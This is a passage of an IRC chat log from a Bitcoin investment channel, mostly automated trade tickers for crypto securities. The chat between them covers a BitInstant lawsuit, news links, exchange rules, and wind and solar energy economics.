15 16:09:08 [BTCTC] [TAT.ASICMINER] 10 @ 0.0391 = 0.391 BTC [-] Aug 15 16:09:09 [BTCTC] [TAT.ASICMINER] 14 @ 0.03903 = 0.5464 BTC [-] Aug 15 16:09:10 [BTCTC] [TAT.ASICMINER] 2 @ 0.03902 = 0.078 BTC [-] Aug 15 16:09:11 dexX7 and where is a connection to betcoin.eu? Aug 15 16:09:12 [BTCTC] [TAT.ASICMINER] 6 @ 0.039 = 0.234 BTC [-] Aug 15 16:09:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.039 BTC [-] Aug 15 16:09:14 [BTCTC] [TAT.ASICMINER] 62 @ 0.039 = 2.418 BTC [-] Aug 15 16:09:14 [BTCTC] [TAT.ASICMINER] 51 @ 0.03941 = 2.0099 BTC [+] Aug 15 16:09:15 [BTCTC] [TAT.ASICMINER] 21 @ 0.039 = 0.819 BTC [-] Aug 15 16:09:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.039 = 0.39 BTC [-] Aug 15 16:09:18 [BTCTC] [TAT.ASICMINER] 11 @ 0.039 = 0.429 BTC [-] Aug 15 16:09:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.03899 = 0.3899 BTC [-] Aug 15 16:09:57 how should i know Aug 15 16:10:28 why you mention betcoin then? Aug 15 16:10:31 [BTCTC] [TAT.ASICMINER] 20 @ 0.03896 = 0.7792 BTC [-] Aug 15 16:10:37 the connection ... or disconnection: her user picture is well designed and betcoin looks shady =D Aug 15 16:10:57 [MPEX] [S.MPOE] 7500 @ 0.00084802 = 6.3602 BTC [-] Aug 15 16:10:59 [MPEX] [S.MPOE] 700 @ 0.00084596 = 0.5922 BTC [-] Aug 15 16:11:15 sell MPOE to get in on the fund! Aug 15 16:11:29 https://bitcointalk.org/index.php?topic=262898.msg2855317#msg2855317 Aug 15 16:11:33 Why do most Bitcoiners seem intelligent? Aug 15 16:11:49 i'm not sure how many seconds her enthusiasm will stay after she really assumes the pr role Aug 15 16:11:56 lol Aug 15 16:11:57 upon seeing this Aug 15 16:12:04 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [-] Aug 15 16:12:18 [BTCTC] [ASICMINER-PT] 1 @ 3.927 BTC [+] Aug 15 16:12:24 it's a good strategy Aug 15 16:12:29 telling everyone how smart they are Aug 15 16:12:52 for a gambling site? definitely xD Aug 15 16:12:52 especially if they're not Aug 15 16:12:56 as they won't know the difference. Aug 15 16:13:07 [BTCTC] [ACTIVEMINING] 68 @ 0.005136 = 0.3492 BTC [-] Aug 15 16:13:07 [BTCTC] [ACTIVEMINING] 19 @ 0.005134 = 0.0975 BTC [-] Aug 15 16:13:09 [BTCTC] [ACTIVEMINING] 11 @ 0.00513 = 0.0564 BTC [-] Aug 15 16:13:10 [BTCTC] [ACTIVEMINING] 9 @ 0.005129 = 0.0462 BTC [-] Aug 15 16:13:11 [BTCTC] [ACTIVEMINING] 50 @ 0.005125 = 0.2563 BTC [-] Aug 15 16:13:12 [BTCTC] [ACTIVEMINING] 50 @ 0.005111 = 0.2556 BTC [-] Aug 15 16:13:13 [BTCTC] [ACTIVEMINING] 250 @ 0.00511 = 1.2775 BTC [-] Aug 15 16:13:14 [BTCTC] [ACTIVEMINING] 43 @ 0.005102 = 0.2194 BTC [-] Aug 15 16:13:49 this BitInstant class action seems like "Waaahhhh, volatility!" Aug 15 16:13:59 [BTCTC] [BTC-GROWTH] 25 @ 0.1 = 2.5 BTC [-] Aug 15 16:14:11 they dispute the tx was made in 8 hours not 2 Aug 15 16:14:32 and bitcoin went from 85 to 135 in that time Aug 15 16:14:33 there;s a lot of attention whoring going on. Aug 15 16:14:47 131* Aug 15 16:15:28 the amounts are like $500, $300, $30 Aug 15 16:15:46 3 people, $830, time for a class action! Aug 15 16:16:52 http://www.youtube.com/watch?v=mB2qlkkJ4zY Aug 15 16:16:55 Bitcoin Foundation Jon Matonis Interview - YouTube Aug 15 16:17:06 [BTCTC] [BTC-GROWTH] 30 @ 0.1 = 3 BTC [-] Aug 15 16:17:08 first question : gamblong! Aug 15 16:17:10 i Aug 15 16:17:32 did they actually file it ? Aug 15 16:18:06 yes Aug 15 16:18:15 he borrowed hair from amir, didnt he? but washed it at least Aug 15 16:19:15 "since the value of bitcoins is highly volatile, consumers pay a premium to bitinstant for the fast transaction speed bitinstant purports to provide. but bitinstant has repeatedly failed to deliver on its promite, and consumers who have paid bitinstant's premium fees have had their funds tief up for hours, days or even weeks." Aug 15 16:19:36 tief up! Aug 15 16:19:49 *d Aug 15 16:19:49 xD Aug 15 16:19:56 [BTCTC] [TAT.ASICMINER] 9 @ 0.03898 = 0.3508 BTC [+] Aug 15 16:20:17 the 830 budged is too tighty to allow proofreading of court filings Aug 15 16:20:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.03898 = 0.078 BTC [+] Aug 15 16:20:41 [BTCTC] [BTC-GROWTH] 30 @ 0.1 = 3 BTC [-] Aug 15 16:20:47 http://www.forbes.com/sites/insider/2013/08/14/goodbye-switzerland-hello-bitcoins/ Aug 15 16:20:50 Goodbye Switzerland, Hello Bitcoins - Forbes Aug 15 16:20:54 forbes love sbitcoin Aug 15 16:21:08 they now print jumbled articles that say nothing Aug 15 16:21:32 [BTCTC] [BTC-GROWTH] 11 @ 0.1 = 1.1 BTC [-] Aug 15 16:21:53 i'm not sure if ive seen bitcoin on thereg before Aug 15 16:21:53 http://www.theregister.co.uk/2013/08/15/oz_bank_closes_bitcoin_business_bank_accounts/ Aug 15 16:22:22 yeah they have some articles my bad Aug 15 16:22:54 http://blogs.marketwatch.com/thetell/2013/08/14/bitcoins-are-a-buy-at-50-richard-bove-says/ Aug 15 16:22:56 Bitcoins are a buy at $50, Richard Bove says - The Tell - MarketWatch Aug 15 16:23:04 genius! Aug 15 16:23:24 “If I could buy them at a low enough price, like $50, then I think it would be worthwhile speculating with a few of them,” he said in a phone interview. Aug 15 16:23:37 lmao Aug 15 16:23:49 While the bitcoin isn’t ready for use in the mass market yet, that could change in five years, he said. “In 10 years, definitely.” Aug 15 16:24:01 all these people starting with the "o, im pretty cool, maybe i'd consider this bitcoin thing" Aug 15 16:24:09 as if. Aug 15 16:25:15 [BTCTC] [BTC-GROWTH] 13 @ 0.1 = 1.3 BTC [-] Aug 15 16:25:56 https://blockchain.info/ticker Aug 15 16:26:01 no longer using goxprice Aug 15 16:26:14 no more gox Aug 15 16:27:49 $avg Aug 15 16:27:50 [BTCTC] [BTC-GROWTH] 5 @ 0.1 = 0.5 BTC [-] Aug 15 16:27:50 ThickAsThieves: 106.90 Aug 15 16:28:31 BFL "No Really, We ARE Shipping" Commercial http://www.youtube.com/watch?v=ti6bLEF2NYI Aug 15 16:28:43 bah Aug 15 16:29:24 feels like one of those onling ITT commercials Aug 15 16:29:48 learn how to weld, be a systems admin! Aug 15 16:33:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.03898 BTC [+] Aug 15 16:35:10 lol Aug 15 16:35:26 [BTCTC] [BTC-GROWTH] 40 @ 0.1 = 4 BTC [-] Aug 15 16:35:29 [BTCTC] [BTC-GROWTH] 90 @ 0.1 = 9 BTC [-] Aug 15 16:35:38 this bfl shit makes all the scam accusations over the may bfl bet so humorous. Aug 15 16:35:48 [HAVELOCK] [VTX] 5 @ 0.61 = 3.05 BTC [-] Aug 15 16:35:51 [HAVELOCK] [VTX] 4 @ 0.60000011 = 2.4 BTC [-] Aug 15 16:35:53 [HAVELOCK] [VTX] 5 @ 0.6 = 3 BTC [-] Aug 15 16:35:55 [HAVELOCK] [VTX] 15 @ 0.6 = 9 BTC [-] Aug 15 16:35:57 [HAVELOCK] [VTX] 21 @ 0.5900201 = 12.3904 BTC [-] Aug 15 16:36:09 [HAVELOCK] [XBOND] 1 @ 0.00105 BTC [+] Aug 15 16:36:28 [BTCTC] [BTC-GROWTH] 150 @ 0.1 = 15 BTC [-] Aug 15 16:36:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.03898 = 0.1949 BTC [+] Aug 15 16:36:41 [BTCTC] [TAT.ASICMINER] 97 @ 0.03899 = 3.782 BTC [+] Aug 15 16:36:57 [BTCTC] [ACTIVEMINING] 2 @ 0.005174 = 0.0103 BTC [+] Aug 15 16:36:58 [BTCTC] [ACTIVEMINING] 100 @ 0.005106 = 0.5106 BTC [-] Aug 15 16:36:59 [BTCTC] [ACTIVEMINING] 166 @ 0.005105 = 0.8474 BTC [-] Aug 15 16:37:21 [HAVELOCK] [XBOND] 8 @ 0.00105 = 0.0084 BTC [+] Aug 15 16:37:27 [MPEX] [S.MPOE] 8088 @ 0.00084907 = 6.8673 BTC [+] Aug 15 16:37:37 [HAVELOCK] [XBOND] 1 @ 0.00105 BTC [+] Aug 15 16:37:40 DeadTerra, re: IceDrill "Lastly, with the new deal with Hashfast the new maximum amount of shares within the structure is 36.3 million (363 Thash @ nominal clock speeds). The aim is to raise a total of 35000 BTC. We would like to sell a total of 25.5 million shares while reducing the private shares to approximately 30% (down from 40%). This ultimately means we increase the percent Aug 15 16:37:40 owned to keep the shares at 10/Mhash (equivalent starting mining power for comparison) each and we would then subsequently reduce the amount of privately held shares to pay for the bulk purchases and price changes with Hashfast." Aug 15 16:37:56 [HAVELOCK] [AM100] 2 @ 0.0388999 = 0.0778 BTC [+] Aug 15 16:38:00 [BTCTC] [BITVPS] 35 @ 0.00325 = 0.1138 BTC [+] Aug 15 16:38:01 [BTCTC] [BITVPS] 61 @ 0.00325 = 0.1983 BTC [+] Aug 15 16:38:12 [BTCTC] [DMS.MINING] 95 @ 0.002877 = 0.2733 BTC [-] Aug 15 16:38:48 [BTCTC] [BTC-GROWTH] 124 @ 0.1 = 12.4 BTC [-] Aug 15 16:38:50 How about just ipoing the bitcoins Aug 15 16:38:55 Buy my bitcoin trust Aug 15 16:38:58 with your bitcoins Aug 15 16:39:08 [BTCTC] [BASIC-MINING] 3 @ 0.2956 = 0.8868 BTC [-] Aug 15 16:39:08 ThickAsThieves: thats around what DMC did Aug 15 16:39:20 ThickAsThieves: but BTC was $10 then Aug 15 16:39:32 [BTCTC] [TAT.ASICMINER] 67 @ 0.04034 = 2.7028 BTC [+] Aug 15 16:39:32 [BTCTC] [TAT.ASICMINER] 10 @ 0.04035 = 0.4035 BTC [+] Aug 15 16:39:34 [BTCTC] [TAT.ASICMINER] 50 @ 0.04037 = 2.0185 BTC [+] Aug 15 16:39:35 [BTCTC] [TAT.ASICMINER] 51 @ 0.04038 = 2.0594 BTC [+] Aug 15 16:39:37 [BTCTC] [TAT.ASICMINER] 99 @ 0.04054 = 4.0135 BTC [+] Aug 15 16:39:45 [BTCTC] [BTC-GROWTH] 22 @ 0.1 = 2.2 BTC [-] Aug 15 16:39:58 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [-] Aug 15 16:40:33 oh yeah how is the demented mining center going or what does it stand for again Aug 15 16:40:47 [BTCTC] [BTC-GROWTH] 100 @ 0.1 = 10 BTC [-] Aug 15 16:41:10 [BTCTC] [TAT.MINIGAME] 9 @ 0.000229 = 0.0021 BTC [+] Aug 15 16:41:19 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1998 = 0.3996 BTC [+] Aug 15 16:41:20 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1998 BTC [+] Aug 15 16:41:22 [BTCTC] [CRYPTO-TRADE] 9 @ 0.1999 = 1.7991 BTC [+] Aug 15 16:41:24 [BTCTC] [CRYPTO-TRADE] 87 @ 0.2 = 17.4 BTC [+] Aug 15 16:41:26 [BTCTC] [CRYPTO-TRADE] 41 @ 0.2 = 8.2 BTC [+] Aug 15 16:41:55 ThickAsThieves you wish you got into amethyst at the ground floor nao. Aug 15 16:42:43 a few days ago gox announced they'd pay another bitcoin promotion campain like the g8 paper - www.bitcoins.com -- here is the cache version: http://webcache.googleusercontent.com/search?q=cache:0QVzBvbKfFAJ:www.bitcoins.com/stories -- those announcements (facebook, reddit) were deleted and bitcoins.com replaced by a "where can i get bitcoin? here of course, soon" website" Aug 15 16:42:52 [HAVELOCK] [XBOND] 12 @ 0.00105 = 0.0126 BTC [+] Aug 15 16:43:07 I am the amethyst Aug 15 16:43:18 the gem behind the curtain Aug 15 16:43:23 I have a boars seat at amethyst Aug 15 16:43:31 Sorry 2 board seats Aug 15 16:43:34 [HAVELOCK] [XBOND] 500 @ 0.00105 = 0.525 BTC [+] Aug 15 16:43:51 dexX7 heh. Aug 15 16:43:55 listen, why don't you start a blog ? Aug 15 16:44:20 [BTCTC] [BTC-GROWTH] 100 @ 0.1 = 10 BTC [-] Aug 15 16:44:35 "ipoing the bitcoins" that's too simple. Aug 15 16:44:40 are you sarcastic? Aug 15 16:44:44 no, im serious. Aug 15 16:44:55 i suggest ipoing preorders to the winkelvoss fund Aug 15 16:45:10 there's a value in curating information. that snippet you just put up is a step in the right direction, i'd for instance quote it if a new "tux is a liar" discussion comes up Aug 15 16:45:35 not that it likely would as it's about the third time they did that sort of shit by now, but it's good to have anyway. Aug 15 16:45:59 :) Aug 15 16:46:28 perfectly reasonable way to build trust and participate. keep a well managed blog. Aug 15 16:46:53 https://796.com/xchange?op=market (Information tab) Aug 15 16:46:56 796 Exchange Aug 15 16:47:00 "Subscription qualification          With Chinese nationality, excluding HKSAR, Macao SAR, Taiwan" Aug 15 16:47:08 racist stocks Aug 15 16:48:14 taiwan isnt even racist Aug 15 16:48:17 taiwan IS china Aug 15 16:48:38 its a former state of the republic of china before the terrorists took over and caused a regime change Aug 15 16:48:58 ya, taiwan is like the last remnants of the white repuiblicans Aug 15 16:49:26 tho iirc they no longer claim the mainland Aug 15 16:49:53 [BTCTC] [ACTIVEMINING] 3 @ 0.005226 = 0.0157 BTC [+] Aug 15 16:50:19 [BTCTC] [BTC-GROWTH] 15 @ 0.1 = 1.5 BTC [-] Aug 15 16:50:23 taiwan even calls itself the RoC Aug 15 16:50:28 (as opposed to the PRoC) Aug 15 16:50:54 [BTCTC] [TAT.ASICMINER] 38 @ 0.0405 = 1.539 BTC [-] Aug 15 16:53:05 https://796.com/other/about.html it excludes hongkong yet it's incorporated there? Aug 15 16:53:07 796 Exchange Aug 15 16:54:12 [HAVELOCK] [SMG] 10 @ 0.0001999 = 0.002 BTC [+] Aug 15 16:58:00 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [-] Aug 15 17:00:29 [BTCTC] [DMS.MINING] 3 @ 0.002869 = 0.0086 BTC [-] Aug 15 17:00:30 [BTCTC] [DMS.MINING] 20 @ 0.00287 = 0.0574 BTC [+] Aug 15 17:00:37 http://www.bbc.co.uk/news/technology-23709009#sa-ns_mchannel=rss&ns_source=PublicRSS20-sa Aug 15 17:00:41 BBC News - Facebook use 'makes people feel worse about themselves' Aug 15 17:00:45 "Using Facebook can reduce young adults' sense of well-being and satisfaction with life, a study has found." Aug 15 17:02:27 [BTCTC] [DMS.MINING] 20 @ 0.002874 = 0.0575 BTC [+] Aug 15 17:02:29 [BTCTC] [DMS.MINING] 105 @ 0.002877 = 0.3021 BTC [+] Aug 15 17:04:29 [BTCTC] [DMS.MINING] 10 @ 0.002878 = 0.0288 BTC [+] Aug 15 17:04:30 [BTCTC] [DMS.MINING] 20 @ 0.00288 = 0.0576 BTC [+] Aug 15 17:04:31 [BTCTC] [DMS.MINING] 128 @ 0.00289 = 0.3699 BTC [+] Aug 15 17:04:38 ;;nethash Aug 15 17:04:39 412988.780365 Aug 15 17:04:42 nice Aug 15 17:04:48 ;;estimate Aug 15 17:04:49 Next difficulty estimate | None based on data since last change | 57692985.7939 based on data for last three days Aug 15 17:05:56 [MPEX] [S.MPOE] 4493 @ 0.00085451 = 3.8393 BTC [+] Aug 15 17:06:41 [BTCTC] [TAT.MINIGAME] 5 @ 0.000229 = 0.0011 BTC [+] Aug 15 17:07:24 [HAVELOCK] [SDSTM] 1 @ 0.00575 BTC [-] Aug 15 17:07:33 [HAVELOCK] [SDSTM] 15 @ 0.0057101 = 0.0857 BTC [-] Aug 15 17:07:36 [BTCTC] [TAT.ASICMINER] 67 @ 0.0404 = 2.7068 BTC [-] Aug 15 17:07:36 [BTCTC] [TAT.ASICMINER] 13 @ 0.03928 = 0.5106 BTC [-] Aug 15 17:07:37 [BTCTC] [TAT.ASICMINER] 9 @ 0.03924 = 0.3532 BTC [-] Aug 15 17:07:38 [BTCTC] [TAT.ASICMINER] 11 @ 0.03923 = 0.4315 BTC [-] Aug 15 17:07:48 [HAVELOCK] [SDSTM] 20 @ 0.00571 = 0.1142 BTC [-] Aug 15 17:07:59 [BTCTC] [ASICMINER-PT] 1 @ 3.913 BTC [-] Aug 15 17:08:07 [BTCTC] [TAT.ASICMINER] 67 @ 0.04042 = 2.7081 BTC [+] Aug 15 17:08:08 [BTCTC] [TAT.ASICMINER] 41 @ 0.04043 = 1.6576 BTC [+] Aug 15 17:08:10 [BTCTC] [TAT.ASICMINER] 92 @ 0.04044 = 3.7205 BTC [+] Aug 15 17:08:22 [BTCTC] [TAT.MINIGAME] 2 @ 0.000229 = 0.0005 BTC [+] Aug 15 17:08:40 [BTCTC] [ASICMINER-PT] 1 @ 3.914 BTC [+] Aug 15 17:11:02 lel @ CFIG Aug 15 17:11:12 [BTCTC] [BTC-GROWTH] 66 @ 0.1 = 6.6 BTC [-] Aug 15 17:11:14 step 2 in their business plan is literally "???" Aug 15 17:11:20 [BTCTC] [TAT.ASICMINER] 67 @ 0.04038 = 2.7055 BTC [-] Aug 15 17:11:21 [BTCTC] [TAT.ASICMINER] 13 @ 0.04039 = 0.5251 BTC [+] Aug 15 17:13:46 [BTCTC] [COGNITIVE] 1 @ 0.3209 BTC [-] Aug 15 17:13:56 [BTCTC] [ASICMINER-PT] 1 @ 3.851 BTC [-] Aug 15 17:13:58 [BTCTC] [ASICMINER-PT] 1 @ 3.85 BTC [-] Aug 15 17:13:59 [BTCTC] [ASICMINER-PT] 2 @ 3.85 = 7.7 BTC [-] Aug 15 17:14:00 [BTCTC] [ASICMINER-PT] 2 @ 3.832 = 7.664 BTC [-] Aug 15 17:14:02 [BTCTC] [ASICMINER-PT] 2 @ 3.831 = 7.662 BTC [-] Aug 15 17:14:07 heh step 1 in my business plan is ??? Aug 15 17:14:11 the rest of its fleshed out Aug 15 17:14:45 you have a full business plan for your scheme? Aug 15 17:15:08 hi tat Aug 15 17:15:08 ThickAsThieves: mostly. Aug 15 17:15:22 ThickAsThieves: the problem is trying to convince investors to invest into their own well being Aug 15 17:15:22 [BTCTC] [ACTIVEMINING] 1 @ 0.005111 BTC [-] Aug 15 17:15:25 [BTCTC] [LABCOIN] 235 @ 0.001631 = 0.3833 BTC [+] Aug 15 17:15:29 ThickAsThieves: which is an uphill battle Aug 15 17:15:48 [BTCTC] [TAT.ASICMINER] 67 @ 0.039 = 2.613 BTC [-] Aug 15 17:15:49 hmm. you're selling nicotine patches? Aug 15 17:15:50 [BTCTC] [TAT.ASICMINER] 13 @ 0.03899 = 0.5069 BTC [-] Aug 15 17:15:51 [BTCTC] [TAT.ASICMINER] 8 @ 0.03891 = 0.3113 BTC [-] Aug 15 17:15:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.0389 BTC [-] Aug 15 17:15:52 [BTCTC] [TAT.ASICMINER] 16 @ 0.03889 = 0.6222 BTC [-] Aug 15 17:15:53 [BTCTC] [TAT.ASICMINER] 25 @ 0.03887 = 0.9718 BTC [-] Aug 15 17:15:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.0388 = 0.0776 BTC [-] Aug 15 17:15:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.0388 BTC [-] Aug 15 17:15:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.0386 BTC [-] Aug 15 17:16:03 nubbins`: green energy Aug 15 17:16:04 [BTCTC] [BTC-GROWTH] 4 @ 0.1 = 0.4 BTC [-] Aug 15 17:16:15 please elaborate! Aug 15 17:16:26 nubbins`: I guess you're new here? Aug 15 17:16:28 [BTCTC] [BASIC-MINING] 1 @ 0.2954 BTC [-] Aug 15 17:16:30 Hi VanCleef Aug 15 17:16:41 i don't lurk much Aug 15 17:16:44 [BTCTC] [DMS.SELLING] 7 @ 0.0181 = 0.1267 BTC [+] Aug 15 17:16:56 o wow it's bitcoin's most purple asset creator Aug 15 17:16:58 [BTCTC] [BTC-GROWTH] 2 @ 0.1 = 0.2 BTC [-] Aug 15 17:16:59 nubbins`: okay, the short version is, Ive been planning out a green energy production facility up here in maine Aug 15 17:17:01 how goes your eminence ? Aug 15 17:17:27 [BTCTC] [LABCOIN] 1 @ 0.001661 BTC [+] Aug 15 17:17:29 i see Aug 15 17:17:37 [BTCTC] [LABCOIN] 234 @ 0.001661 = 0.3887 BTC [+] Aug 15 17:17:47 that's a big job Aug 15 17:18:21 [BTCTC] [BASIC-MINING] 2 @ 0.315 = 0.63 BTC [+] Aug 15 17:18:26 its not that its a big job Aug 15 17:18:29 its that its an expensive job Aug 15 17:18:40 [BTCTC] [LABCOIN] 235 @ 0.001629 = 0.3828 BTC [-] Aug 15 17:18:50 [BTCTC] [ASICMINER-PT] 1 @ 3.925 BTC [+] Aug 15 17:19:13 [BTCTC] [LABCOIN] 2 @ 0.001592 = 0.0032 BTC [-] Aug 15 17:19:46 [BTCTC] [ASICMINER-PT] 6 @ 3.926 = 23.556 BTC [+] Aug 15 17:20:03 [BTCTC] [LABCOIN] 1 @ 0.001593 BTC [+] Aug 15 17:20:32 [BTCTC] [LABCOIN] 235 @ 0.001627 = 0.3823 BTC [+] Aug 15 17:20:43 interchangeable in some respects Aug 15 17:20:49 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [-] Aug 15 17:21:13 what sort of green? wind/water/geothermal? Aug 15 17:21:58 [BTCTC] [LABCOIN] 235 @ 0.001661 = 0.3903 BTC [+] Aug 15 17:22:36 [BTCTC] [BTC-GROWTH] 500 @ 0.1 = 50 BTC [-] Aug 15 17:23:22 wind and solar combined. Aug 15 17:23:43 [BTCTC] [LABCOIN] 235 @ 0.001661 = 0.3903 BTC [+] Aug 15 17:23:45 right on Aug 15 17:23:58 i've been really interested in passive solar design lately Aug 15 17:24:04 window collectors, etc Aug 15 17:24:26 small-scale diy-type projects Aug 15 17:24:35 step 1: install shit on own roof? Aug 15 17:24:48 [BTCTC] [DMS.SELLING] 10 @ 0.0181 = 0.181 BTC [+] Aug 15 17:24:51 [BTCTC] [LABCOIN] 235 @ 0.001626 = 0.3821 BTC [-] Aug 15 17:25:51 the problem with wind is is current turbines are about $1.8m per Mw Aug 15 17:26:05 [BTCTC] [TAT.ASICMINER] 67 @ 0.04024 = 2.6961 BTC [+] Aug 15 17:26:06 [BTCTC] [TAT.ASICMINER] 50 @ 0.04026 = 2.013 BTC [+] Aug 15 17:26:08 [BTCTC] [TAT.ASICMINER] 99 @ 0.04029 = 3.9887 BTC [+] Aug 15 17:26:09 [BTCTC] [TAT.ASICMINER] 23 @ 0.04029 = 0.9267 BTC [+] Aug 15 17:26:11 [BTCTC] [TAT.ASICMINER] 7 @ 0.04029 = 0.282 BTC [+] Aug 15 17:26:30 [BTCTC] [LABCOIN] 235 @ 0.001659 = 0.3899 BTC [+] Aug 15 17:26:41 [BTCTC] [BTC-GROWTH] 100 @ 0.1 = 10 BTC [-] Aug 15 17:26:43 yeah, nothing green can compete $/mW Aug 15 17:27:01 not yet, anyway Aug 15 17:27:41 [BTCTC] [ASICMINER-PT] 3 @ 3.926 = 11.778 BTC [+] Aug 15 17:27:50 next gen turbines may drop that down to half that Aug 15 17:27:53 [BTCTC] [LABCOIN] 235 @ 0.001627 = 0.3823 BTC [-] Aug 15 17:28:00 solar can compete Aug 15 17:28:17 [BTCTC] [ASICMINER-PT] 1 @ 3.925 BTC [-] Aug 15 17:28:18 maybe not yet un the us Aug 15 17:28:25 *in the Aug 15 17:28:32 PV cells, or passive? Aug 15 17:28:42 [BTCTC] [DMS.MINING] 30 @ 0.00291 = 0.0873 BTC [+] Aug 15 17:28:45 passive is just smart design. Aug 15 17:28:52 [BTCTC] [ASICMINER-PT] 1 @ 3.926 BTC [+] Aug 15 17:29:15 solar competes with some state and municipal programs, but the ROI is still at least 3-10 years. Aug 15 17:29:20 [BTCTC] [LABCOIN] 235 @ 0.001659 = 0.3899 BTC [+] Aug 15 17:29:29 Austin,TX has a great program, some other hippie towns too. Aug 15 17:29:30 [BTCTC] [ASICMINER-PT] 1 @ 3.927 BTC [+] Aug 15 17:29:38 City pays 50-80% of the cost. Aug 15 17:29:41 [BTCTC] [BTC-GROWTH] 50 @ 0.1 = 5 BTC [-] Aug 15 17:29:47 i am on a list for similar Aug 15 17:29:48 well, house design has a lot to do with passive, but there are cheap add ons you can make yourself Aug 15 17:29:50 e.g. http://omegamanjournal.files.wordpress.com/2012/04/solar_air_window_box_collectors.gif Aug 15 17:29:51 if they sign a tie-in agreement and sell back to the grid. Aug 15 17:29:55 lol what ROI do you want? 6 months? Aug 15 17:30:12 Well it was 30 years in 1970. Aug 15 17:30:18 [BTCTC] [TAT.ASICMINER] 3 @ 0.04027 = 0.1208 BTC [-] Aug 15 17:30:33 [BTCTC] [LABCOIN] 235 @ 0.001628 = 0.3826 BTC [-] Aug 15 17:30:34 [BTCTC] [BTC-GROWTH] 49 @ 0.1 = 4.9 BTC [-] Aug 15 17:30:34 w/out the programs it is still 15 years. Aug 15 17:30:50 is why i mention it Aug 15 17:31:25 [BTCTC] [DMS.SELLING] 2 @ 0.0181 = 0.0362 BTC [+] Aug 15 17:31:25 lotta places don't have subsidy programs, or even selling back to the grid Aug 15 17:31:26 [BTCTC] [DMS.MINING] 1 @ 0.00292 BTC [+] Aug 15 17:31:29 I'm a NABCEP certified Solar installer, although I think my cert has expired. glad to be off the roof! Aug 15 17:31:35 i know, that's lame. Aug 15 17:31:40 [BTCTC] [LABCOIN] 235 @ 0.001657 = 0.3894 BTC [+] Aug 15 17:31:46 roof work is tough Aug 15 17:31:53 i wouldn't be at it Aug 15 17:32:28 anyway, mother earth news has a lotta good articles about green energy Aug 15 17:32:38 and related things Aug 15 17:32:49 [BTCTC] [LABCOIN] 235 @ 0.001622 = 0.3812 BTC [-] Aug 15 17:32:55 deadweasel in romania you can pretty much get solar for free as a tax deduction Aug 15 17:32:57 deadweasel: well, if you wanted to move to maine, I wouldnt mind hiring you Aug 15 17:32:59 when they discovered i 'do computers' as they put it, I was dragged into the office to overhaul their Win XP WORKGROUP network... it's was a shitstorm. Aug 15 17:33:01 the problem being that people tax avoid like hell Aug 15 17:33:06 Diablo-D3: I live in maine. Aug 15 17:33:16 [HAVELOCK] [AM100] 1 @ 0.0387999 BTC [-] Aug 15 17:33:17 wait Aug 15 17:33:18 what? Aug 15 17:33:19 mircea_popescu: that's the way it should be. Aug 15 17:33:23 is it national program? Aug 15 17:33:27 [BTCTC] [DMS.MINING] 22 @ 0.00291 = 0.064 BTC [-] Aug 15 17:33:27 yeah Aug 15 17:33:35 deadweasel: since when did you live in maine Aug 15 17:33:38 that's great, Romania gets better every day. Aug 15 17:33:42 romania is actually very energy-adsvanced for some reason. Aug 15 17:33:44 Since 4 years ago. Aug 15 17:33:45 let me find this link 1 sec Aug 15 17:33:46 [BTCTC] [DMS.SELLING] 170 @ 0.01814 = 3.0838 BTC [+] Aug 15 17:33:50 deadweasel: heh. Aug 15 17:33:58 deadweasel: well at some point I'll have to hire people in advisory roles Aug 15 17:33:59 [BTCTC] [TAT.VIRTUALMINE] 28 @ 0.000971 = 0.0272 BTC [-] Aug 15 17:34:14 [BTCTC] [ACTIVEMINING] 30 @ 0.005122 = 0.1537 BTC [+] Aug 15 17:34:16 [BTCTC] [ACTIVEMINING] 18 @ 0.005121 = 0.0922 BTC [-] Aug 15 17:34:17 [BTCTC] [ACTIVEMINING] 100 @ 0.00511 = 0.511 BTC [-] Aug 15 17:34:18 [BTCTC] [ACTIVEMINING] 20 @ 0.00511 = 0.1022 BTC [-] Aug 15 17:34:20 [BTCTC] [ACTIVEMINING] 334 @ 0.005105 = 1.7051 BTC [-] Aug 15 17:34:20 [BTCTC] [ACTIVEMINING] 50 @ 0.005101 = 0.2551 BTC [-] Aug 15 17:34:21 [BTCTC] [ACTIVEMINING] 25 @ 0.0051 = 0.1275 BTC [-] Aug 15 17:34:22 [BTCTC] [ACTIVEMINING] 423 @ 0.0051 = 2.1573 BTC [-] Aug 15 17:34:23 it's interesting to see how different countries prioritize things Aug 15 17:34:26 [BTCTC] [LABCOIN] 9 @ 0.001623 = 0.0146 BTC [+] Aug 15 17:34:27 [BTCTC] [LABCOIN] 226 @ 0.001624 = 0.367 BTC [+] Aug 15 17:34:38 when i lived in SK, they had an amazing recycling program Aug 15 17:34:40 [BTCTC] [LABCOIN] 9 @ 0.001624 = 0.0146 BTC [+] Aug 15 17:34:48 keeping in mind that recycling isn't usually "amazing" stuff Aug 15 17:35:02 deadweasel http://www.transelectrica.ro/StareSistem/protocoale/starea_sistemului.php Aug 15 17:35:17 that's actually an up to date energy counter for the country Aug 15 17:35:21 [MPEX] [S.MPOE] 3839 @ 0.00085451 = 3.2805 BTC [+] Aug 15 17:35:26 but you go to throw out your household trash and there are literally 14 different recycling bins for different types of glass, plastic, paper, etc Aug 15 17:35:41 [BTCTC] [LABCOIN] 235 @ 0.001656 = 0.3892 BTC [+] Aug 15 17:36:09 mircea_popescu, that's a modern energy grid?! I've never seen one before, because I live in the states.... :( Aug 15 17:36:11 as you can see a good 15-20% is wind Aug 15 17:36:26 very dry summer atm so hydro is way low. Aug 15 17:36:44 but 100mw of solar, even 30mw of biomass online right now Aug 15 17:36:45 I love the updates on the map. very cool infographic. Aug 15 17:36:49 [BTCTC] [LABCOIN] 235 @ 0.001655 = 0.3889 BTC [-] Aug 15 17:36:51 yeh, they know their shit. Aug 15 17:37:25 